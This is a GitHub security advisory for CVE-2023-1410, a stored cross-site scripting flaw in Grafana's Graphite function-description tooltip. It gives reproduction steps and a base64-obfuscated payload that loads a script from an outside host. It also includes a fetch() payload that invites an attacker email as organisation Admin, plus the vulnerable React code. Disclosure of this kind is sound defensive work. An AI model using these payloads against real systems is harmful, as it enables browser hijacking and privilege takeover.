ghsa-qrrg-gw7w-vp76
Vulnerability from github
Summary
When a Graphite data source is added, one can use this data source in a dashboard. This contains a feature to use Functions
. Once a function is selected, a small tooltip will be shown when hovering over the name of the function. This tooltip will allow you to delete the selected Function from your query or show the Function Description. However, no sanitization is done when adding this description to the DOM. Since it is not uncommon to connect to public data sources, and attacker could host a Graphite instance with modified Function Descriptions containing XSS payloads. When the victim uses it in a query and accidentally hovers over the Function Description, an attacker controlled XSS payload will be executed. This can be used to add the attacker as an Admin for example.
Details
- Spin up your own Graphite instance. I've done this using the
make devenv sources=graphite
. - Now start a terminal for your Graphite container and modify the following file
/opt/graphite/webapp/graphite/render/functions.py
- Basically you can pick any function but I picked the
aggregateSeriesLists
function. Modify its description to be"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY20yLnRlbCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))>
The result would look like this:
```python def aggregateSeriesLists(requestContext, seriesListFirstPos, seriesListSecondPos, func, xFilesFactor=None): """
">
"""
if len(seriesListFirstPos) != len(seriesListSecondPos):
raise InputParameterError(
"seriesListFirstPos and seriesListSecondPos argument must have equal length")
results = []
for i in range(0, len(seriesListFirstPos)):
firstSeries = seriesListFirstPos[i]
secondSeries = seriesListSecondPos[i]
aggregated = aggregate(requestContext, (firstSeries, secondSeries), func, xFilesFactor=xFilesFactor)
if not aggregated: # empty list, no data found
continue
result = aggregated[0] # aggregate() can only return len 1 list
result.name = result.name[:result.name.find('Series(')] + 'Series(%s,%s)' % (firstSeries.name, secondSeries.name)
results.append(result)
return results
aggregateSeriesLists.group = 'Combine'
aggregateSeriesLists.params = [
Param('seriesListFirstPos', ParamTypes.seriesList, required=True),
Param('seriesListSecondPos', ParamTypes.seriesList, required=True),
Param('func', ParamTypes.aggFunc, required=True),
Param('xFilesFactor', ParamTypes.float),
]
```
- Save and quit the file. Restart your Graphite Container (I did this using the Restart Icon in Docker Desktop)
- Now login to your Grafana instance as an Organisation Admin.
- Navigate to http://[grafana]/plugins/graphite and click
Create a Graphite data source
- Add the url to the attackers Graphite instance (maybe enable
Skip TLS Verify
) and clickSave & test
andExplore
- In the newly opened page click the + icon next to
Functions
and search foraggregateSeriesLists
and click it to add it. - Now hover over
aggregateSeriesLists
with your mouse and move your mouse to the?
icon.
Result
Our payload will trigger and in this case it will include an external script to trigger the alerts.
Decoded payload
javascript
var a=document.createElement("script");a.src="https://cm2.tel";document.body.appendChild(a);
Impact
In the POC we've picked 1 function to have a XSS payload, but a real attacker would of course maximize the likelihood by replacing all of it's descriptions with XSS payloads. As shown above the attacker can now run arbitrary javascript in the browser of the victim. The victim can be any user using the malicious Graphite instance in a query (or while Exploring), including the Organisation Admin. If so, an attacker could include a payload to add them as an admin themselves.
An example would be something like this:
javascript
fetch("/api/org/invites", {
"headers": {
"content-type": "application/json"
},
"body": "{\"name\":\"\",\"email\":\"\",\"role\":\"Admin\",\"sendEmail\":true,\"loginOrEmail\":\"hacker@hacker.com\"}",
"method": "POST",
"credentials": "include"
});
Mitigation
The vulnerability seems to occur in the following file: public\app\plugins\datasource\graphite\components\FunctionEditorControls.tsx
typescript
const FunctionDescription = React.lazy(async () => {
// @ts-ignore
const { default: rst2html } = await import(/* webpackChunkName: "rst2html" */ 'rst2html');
return {
default(props: { description?: string }) {
return <div dangerouslySetInnerHTML={{ __html: rst2html(props.description ?? '') }} />;
},
};
});
In many other similar cases, some form of sanitization is used. I would advise to use the same here as rst2html itself will just leave HTML untouched when parsing the expected reStructuredText from Graphite. So now when it is applied using dangerouslySetInnerHTML our XSS payload will survive.
{ "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/grafana/grafana" }, "ranges": [ { "events": [ { "introduced": "8.0.0" }, { "fixed": "8.5.22" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Go", "name": "github.com/grafana/grafana" }, "ranges": [ { "events": [ { "introduced": "9.3.0" }, { "fixed": "9.3.11" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Go", "name": "github.com/grafana/grafana" }, "ranges": [ { "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.7" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Go", "name": "github.com/grafana/grafana" }, "ranges": [ { "events": [ { "introduced": "9.0.0" }, { "fixed": "9.2.15" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2023-1410" ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2023-03-23T20:10:47Z", "nvd_published_at": null, "severity": "MODERATE" }, "details": "### Summary\nWhen a Graphite data source is added, one can use this data source in a dashboard. This contains a feature to use `Functions`. Once a function is selected, a small tooltip will be shown when hovering over the name of the function. This tooltip will allow you to delete the selected Function from your query or show the Function Description. However, no sanitization is done when adding this description to the DOM. Since it is not uncommon to connect to public data sources, and attacker could host a Graphite instance with modified Function Descriptions containing XSS payloads. When the victim uses it in a query and accidentally hovers over the Function Description, an attacker controlled XSS payload will be executed. This can be used to add the attacker as an Admin for example. \n\n### Details\n\n1. Spin up your own Graphite instance. I\u0027ve done this using the `make devenv sources=graphite`.\n2. Now start a terminal for your Graphite container and modify the following file `/opt/graphite/webapp/graphite/render/functions.py` \n3. Basically you can pick any function but I picked the `aggregateSeriesLists` function. Modify its description to be `\"\u003e\u003cimg src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY20yLnRlbCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))\u003e`\n\nThe result would look like this:\n\n```python\ndef aggregateSeriesLists(requestContext, seriesListFirstPos, seriesListSecondPos, func, xFilesFactor=None):\n \"\"\" \n \n \"\u003e\u003cimg src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY20yLnRlbCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))\u003e\n \n \"\"\" \n if len(seriesListFirstPos) != len(seriesListSecondPos): \n raise InputParameterError( \n \"seriesListFirstPos and seriesListSecondPos argument must have equal length\")\n results = [] \n \n for i in range(0, len(seriesListFirstPos)): \n firstSeries = seriesListFirstPos[i] \n secondSeries = seriesListSecondPos[i] \n aggregated = aggregate(requestContext, (firstSeries, secondSeries), func, xFilesFactor=xFilesFactor) \n if not aggregated: # empty list, no data found \n continue \n result = aggregated[0] # aggregate() can only return len 1 list \n result.name = result.name[:result.name.find(\u0027Series(\u0027)] + \u0027Series(%s,%s)\u0027 % (firstSeries.name, secondSeries.name)\n results.append(result) \n return results \n \n \naggregateSeriesLists.group = \u0027Combine\u0027 \naggregateSeriesLists.params = [\n Param(\u0027seriesListFirstPos\u0027, ParamTypes.seriesList, required=True),\n Param(\u0027seriesListSecondPos\u0027, ParamTypes.seriesList, required=True),\n Param(\u0027func\u0027, ParamTypes.aggFunc, required=True), \n Param(\u0027xFilesFactor\u0027, ParamTypes.float), \n] \n```\n\n4. Save and quit the file. Restart your Graphite Container (I did this using the Restart Icon in Docker Desktop)\n5. Now login to your Grafana instance as an Organisation Admin.\n6. Navigate to http://[grafana]/plugins/graphite and click `Create a Graphite data source`\n7. Add the url to the attackers Graphite instance (maybe enable `Skip TLS Verify`) and click `Save \u0026 test` and `Explore`\n8. In the newly opened page click the + icon next to `Functions` and search for `aggregateSeriesLists` and click it to add it.\n9. Now hover over `aggregateSeriesLists` with your mouse and move your mouse to the `?` icon.\n\n### Result\n\nOur payload will trigger and in this case it will include an external script to trigger the alerts.\n\n#### Decoded payload\n\n```javascript\nvar a=document.createElement(\"script\");a.src=\"https://cm2.tel\";document.body.appendChild(a);\n```\n\n![image](https://user-images.githubusercontent.com/26874824/225035735-5d00e5d9-3302-4257-8f95-dd562e752893.png)\n\n\n### Impact\n\nIn the POC we\u0027ve picked 1 function to have a XSS payload, but a real attacker would of course maximize the likelihood by replacing all of it\u0027s descriptions with XSS payloads. As shown above the attacker can now run arbitrary javascript in the browser of the victim. The victim can be any user using the malicious Graphite instance in a query (or while Exploring), including the Organisation Admin. If so, an attacker could include a payload to add them as an admin themselves.\n\nAn example would be something like this:\n\n```javascript\nfetch(\"/api/org/invites\", {\n \"headers\": {\n \"content-type\": \"application/json\"\n },\n \"body\": \"{\\\"name\\\":\\\"\\\",\\\"email\\\":\\\"\\\",\\\"role\\\":\\\"Admin\\\",\\\"sendEmail\\\":true,\\\"loginOrEmail\\\":\\\"hacker@hacker.com\\\"}\",\n \"method\": \"POST\",\n \"credentials\": \"include\"\n});\n```\n\n### Mitigation\n\nThe vulnerability seems to occur in the following file: public\\app\\plugins\\datasource\\graphite\\components\\FunctionEditorControls.tsx\n\n```typescript\nconst FunctionDescription = React.lazy(async () =\u003e {\n // @ts-ignore\n const { default: rst2html } = await import(/* webpackChunkName: \"rst2html\" */ \u0027rst2html\u0027);\n return {\n default(props: { description?: string }) {\n return \u003cdiv dangerouslySetInnerHTML={{ __html: rst2html(props.description ?? \u0027\u0027) }} /\u003e;\n },\n };\n});\n```\n\nIn many other similar cases, some form of sanitization is used. I would advise to use the same here as rst2html itself will just leave HTML untouched when parsing the expected reStructuredText from Graphite. So now when it is applied using dangerouslySetInnerHTML our XSS payload will survive.", "id": "GHSA-qrrg-gw7w-vp76", "modified": "2023-03-23T20:10:47Z", "published": "2023-03-23T20:10:47Z", "references": [ { "type": "WEB", "url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1410" }, { "type": "WEB", "url": "https://github.com/grafana/grafana/commit/42911348a76e8484396b951bef8b7bff97a84cbc" }, { "type": "WEB", "url": "https://github.com/grafana/grafana/commit/e59427c0747ae2f3feb1bfc3a4b87f0886208cc6" }, { "type": "WEB", "url": "https://github.com/grafana/grafana/commit/ef2eb2b6bf1d7c0fb781e3e05d0d1aecd6dd438a" }, { "type": "WEB", "url": "https://github.com/grafana/grafana/commit/f9548d33f8624d6694983fe5aad181007405be8a" }, { "type": "PACKAGE", "url": "https://github.com/grafana/grafana" }, { "type": "WEB", "url": "https://grafana.com/security/security-advisories/cve-2023-1410" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N", "type": "CVSS_V3" } ], "summary": "Grafana Stored Cross-site Scripting in Graphite FunctionDescription tooltip" }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.